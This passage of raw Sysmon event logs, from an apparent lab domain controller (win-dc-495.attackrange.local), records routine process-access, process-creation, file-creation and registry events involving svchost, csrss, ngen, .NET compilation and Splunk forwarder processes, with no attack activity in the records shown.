)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.805{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9235-6005-1904-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000008347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:45.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9235-6005-1904-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.789{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9235-6005-1904-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.649{59A5CD1D-9235-6005-1904-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:45.539{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9235-6005-1804-00000000A301}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.524{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9235-6005-1804-00000000A301}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:45.524{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9235-6005-1804-00000000A301}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:45.164{59A5CD1D-922D-6005-1604-00000000A301}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1220-0\System.Data.Entity.dll2021-01-18 13:50:45.164 10341000x80000000000000008373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:46.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9236-6005-1D04-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.821{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9236-6005-1D04-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:46.821{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9236-6005-1D04-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:46.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9236-6005-1C04-00000000A301}2128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.664{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9236-6005-1C04-00000000A301}2128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:46.664{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9236-6005-1C04-00000000A301}2128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 13241300x80000000000000008367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:50:46.664{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda0-0xec28b099) 11241100x80000000000000008366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:50:46.571{59A5CD1D-9235-6005-1A04-00000000A301}4824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12d8-0\System.Data.Entity.Design.dll2021-01-18 13:50:46.571 10341000x80000000000000008365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9236-6005-1B04-00000000A301}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
